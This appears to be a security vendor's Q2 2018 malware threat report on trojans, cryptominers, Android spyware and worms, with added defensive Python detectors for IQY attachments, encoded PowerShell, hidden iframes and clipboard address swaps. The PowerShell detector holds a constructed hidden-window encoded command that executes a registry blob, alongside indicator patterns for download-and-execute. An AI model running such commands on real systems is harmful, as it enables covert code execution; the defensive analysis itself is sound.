Malware runs PowerShell


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
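A mail gateway can inspect an IQY attachment before Excel ever sees it, because the file is plain text: a "WEB" line, a version line, the query URL, then key=value options. The following is an added example, not code from the report or from Comodo, that parses that layout and decides whether to hold the attachment; the sample file body, the placeholder hosts and the allowlist are all constructed for the example.

```python
from urllib.parse import urlparse

# Constructed sample body of an IQY attachment. The layout (a "WEB" line, a
# version line, the query URL, then key=value options) is the Excel web-query
# text format; the host is a placeholder, not an address from the report.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://files.example.invalid/report.txt\r\n"
    "\r\n"
    "Selection=1\r\n"
    "Formatting=None\r\n"
    "PreFormattedTextToColumns=True\r\n"
)

# Hosts an organisation has decided Excel may query (assumed allowlist).
ALLOWED_HOSTS = {"intranet.example.invalid"}


def parse_iqy(text):
    """Return (url, options) from an IQY body, or None if it is not a WEB query."""
    lines = text.splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        return None
    url = lines[2].strip()
    options = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            options[key.strip()] = value.strip()
    return url, options


def assess_iqy(text, allowed_hosts=ALLOWED_HOSTS):
    """Decide whether a mail gateway should hold an IQY attachment and say why."""
    parsed = parse_iqy(text)
    if parsed is None:
        return {"iqy": False, "block": False, "findings": ["not an Excel WEB query"]}
    url, options = parsed
    host = (urlparse(url).hostname or "").lower()
    findings = []
    if not url.lower().startswith("https://"):
        findings.append("query URL is not HTTPS")
    if host not in allowed_hosts:
        findings.append("host %r is not on the allowlist" % host)
    return {"iqy": True, "url": url, "host": host, "options": options,
            "findings": findings, "block": bool(findings)}


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY))
```

The allowlist is the important control: an IQY that points anywhere Excel will happily fetch from is exactly the delivery path described above, so the default decision for an unknown host is to hold the message.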

2.4 The growth of Flawed Ammyy attacks for Q2

Chart: The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.

Chart data, the growth of Flawed Ammyy attacks for Q2 2018 (detections per month, y-axis 40,000 to 50,000): Apr 43,188; May 46,382; Jun 48,881.


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers, and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
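Both the Emotet chain in section 2.2 and BadShell hand their real instructions to PowerShell through a command line whose content is hidden behind an encoded argument, so decoding that argument is the first step of triage. The following is an added example, not code from the report or from Comodo, that decodes a -EncodedCommand value (Base64 of UTF-16LE text) and scores the indicators visible in the command line and its payload. The sample command line is constructed; the registry path and value name inside it are placeholders, not values from the report.

```python
import base64
import re

# Indicators a defender looks for in a PowerShell command line and in its
# decoded payload: (label, case-insensitive regex).
INDICATORS = [
    ("hidden-window",     r"-w(?:indowstyle)?\s+hidden"),
    ("no-profile",        r"-nop(?:rofile)?\b"),
    ("encoded-command",   r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("base64-decode",     r"frombase64string"),
    ("registry-read",     r"get-itemproperty|\bhkcu:|\bhklm:"),
    ("download",          r"downloadstring|downloadfile|invoke-webrequest"),
]


def decode_encoded_command(cmdline):
    """Return the text behind -EncodedCommand/-Enc/-E (Base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Decode the command line and list the indicators present in it and its payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [label for label, pattern in INDICATORS if re.search(pattern, text, re.I)]
    # Three or more independent indicators is the (assumed) threshold for escalation.
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 3}


# Constructed sample of the shape described in the report: a hidden-window
# PowerShell whose encoded payload reads a blob from the registry and executes
# it. The registry key and value name are placeholders.
INNER = ('IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('
         '(Get-ItemProperty HKCU:\\Software\\PlaceholderVendor).Blob)))')
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(INNER.encode("utf-16le")).decode("ascii"))

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Run this over process-creation telemetry (command-line field) rather than over files: the point of fileless tradecraft is that the file never exists, but the command line always does.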

BadShell at work


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner occupies the victim's computer undividedly, using its resources to mine cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, making it easier for users to detect them. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this.

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
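The camouflage described above (a Base64-encoded 1x1 iframe that loads the cnhv.co shortener) is something a site owner or a web-content scanner can look for directly. The following is an added example, not code from the report or from Comodo: it decodes Base64 literals found in a page and reports iframes that are invisible, that point at a known shortener host, or that only appear after decoding. The sample page and the path on the cnhv.co URL are constructed; only the host name comes from the report.

```python
import base64
import re
from html.parser import HTMLParser

# Shortener hosts associated with the miner (cnhv.co is the one named in the
# report); extend from your own intelligence.
KNOWN_SHORTENER_HOSTS = {"cnhv.co"}

# Constructed sample: a page whose script writes a Base64-decoded 1x1 iframe,
# the shape described above. The URL path is a placeholder.
HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/placeholder" width="1" height="1" '
                 'style="display:none"></iframe>')
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>"
    "<script>document.write(atob('"
    + base64.b64encode(HIDDEN_IFRAME.encode("utf-8")).decode("ascii")
    + "'));</script></body></html>"
)


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _decoded_base64_blobs(html):
    """Yield the text of every Base64-looking literal in the page that decodes to UTF-8."""
    for m in re.finditer(r"[A-Za-z0-9+/]{24,}={0,2}", html):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue


def find_hidden_iframes(html):
    """Return findings for iframes in the page itself and in its Base64 payloads."""
    layers = [("page", html)] + [("base64", t) for t in _decoded_base64_blobs(html)]
    findings = []
    for layer, text in layers:
        collector = _IframeCollector()
        collector.feed(text)
        for attrs in collector.iframes:
            src = attrs.get("src") or ""
            host = re.sub(r"^https?://", "", src).split("/")[0].lower()
            tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            hidden = "display:none" in (attrs.get("style") or "").replace(" ", "").lower()
            reasons = []
            if tiny or hidden:
                reasons.append("invisible iframe")
            if host in KNOWN_SHORTENER_HOSTS:
                reasons.append("known miner shortener host")
            if layer == "base64":
                reasons.append("iframe only present after Base64 decoding")
            if reasons:
                findings.append({"layer": layer, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print(f)
```

The decode step is what distinguishes this from the plain string search the text says users had started doing: the visible page contains no iframe and no CoinHive reference, so a grep for the miner's script name finds nothing, while the decoded literal gives the scanner all three reasons at once.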

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack.

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
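One defensive check against the swap just described is to compare what the user copied with what the clipboard holds at paste time, and to alert when an address has turned into a different address. The following is an added example, not code from the report or from Comodo: it performs that comparison on the two addresses quoted above (as strings only, nothing is transacted) and also implements the Base58Check checksum test, which tells you whether an address is well-formed but not whose it is. The checksum test is exercised on the well-known Bitcoin genesis-block address rather than on the report's addresses.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Shape of a legacy (Base58) Bitcoin address: version prefix 1 or 3, then 25-34 more symbols.
ADDRESS_RE = re.compile(r"[13][" + B58_ALPHABET + "]{25,34}")


def base58check_valid(addr):
    """True if addr decodes as Base58Check: its last 4 bytes equal the first 4 bytes
    of double-SHA256 over the rest. A good checksum proves the string is a
    well-formed address, not that it belongs to the intended recipient."""
    if not addr or any(c not in B58_ALPHABET for c in addr):
        return False
    n = 0
    for c in addr:
        n = n * 58 + B58_ALPHABET.index(c)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading_zero_bytes = len(addr) - len(addr.lstrip("1"))  # each leading '1' is a 0x00 byte
    raw = b"\x00" * leading_zero_bytes + body
    if len(raw) < 5:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def looks_like_address(text):
    return ADDRESS_RE.fullmatch(text.strip()) is not None


def check_paste(copied, pasted):
    """Compare the address the user copied with the clipboard content at paste time."""
    if not looks_like_address(copied):
        return {"alert": False, "reason": "copied text is not a wallet address"}
    if copied == pasted:
        return {"alert": False, "reason": "clipboard unchanged"}
    reason = ("wallet address replaced by a different address"
              if looks_like_address(pasted) else "wallet address replaced by other text")
    return {"alert": True, "reason": reason, "intended": copied, "received": pasted,
            "received_checksum_ok": base58check_valid(pasted)}


# The two addresses quoted in the report's example: what the user copied and what
# the hijacker substituted. They are compared as strings only; nothing is sent anywhere.
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
PASTED = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    print(check_paste(COPIED, PASTED))
```

Note that a hijacker's replacement address will usually pass the checksum, since the attacker wants the transfer to succeed; that is why the alert is driven by the change between copy and paste, and the checksum result is reported only as supporting context.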


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions.

Disguises of KevDroid: Version-1 Naver Defender; Version-2 Netease Defender; Version-3 PU

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details, contacts (id, name, phone numbers), and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls, and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Disguises of Desert Scorpion: Version-1 Dardesh (Google Play Services, Instant Apps); Version-2 Settings

The second version of Desert Scorpion records calls, audio, and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata, and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Disguises of Zoo Park:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64, and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details, and external storage content.

The third version is included in spyware named “Spymaster Pro” and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser’s data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers’ data, like the next digital spook, MikeSpy.

Disguises of MikeSpy: Virtual Girlfriend

MikeSpy camouflaged itself as a Virtual Girlfriend application, but instead of a girlfriend it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals’ server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Disguises of Xloader: Version-1 to Version-3: FaceBook, Chrome

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contact details

Set Wi-Fi to always on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make records

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (app distribution): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it “a spy with a 007 license”.

Disguises of Mystery Bot: Version 1: Adobe Flash Player; Version 2: Flash Player

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple “spy legends” to get users’ trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert: Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber; Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Disguises of Hero Rat: Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام, ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltration into a victim’s device, Hero Rat shows a warning like “app can’t be run”. But it runs in the background and starts the spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Disguises of Sonvpay: Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner’s mobile bill. Once installed, this malware displays a fake notification with a “skip option”. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Disguises of CoinHive: Version-1: Netflix Hack, Instagram Hack; Version-2: TSF Launcher; Version-3: Android Service, PlacarTv Futebol Ao Vivo

The malware is covertly propagated via… another cryptominer, named CoinMiner.

How is it possible? Let’s imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims’ machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April

4.2.2 May 2018

Chart: Android-targeted malware in May

4.2.3 June 2018

Chart: Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries’ top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called “Strategic Threat” due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world’s most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a “multi-threaded, polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects “.exe” and “.scr” files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

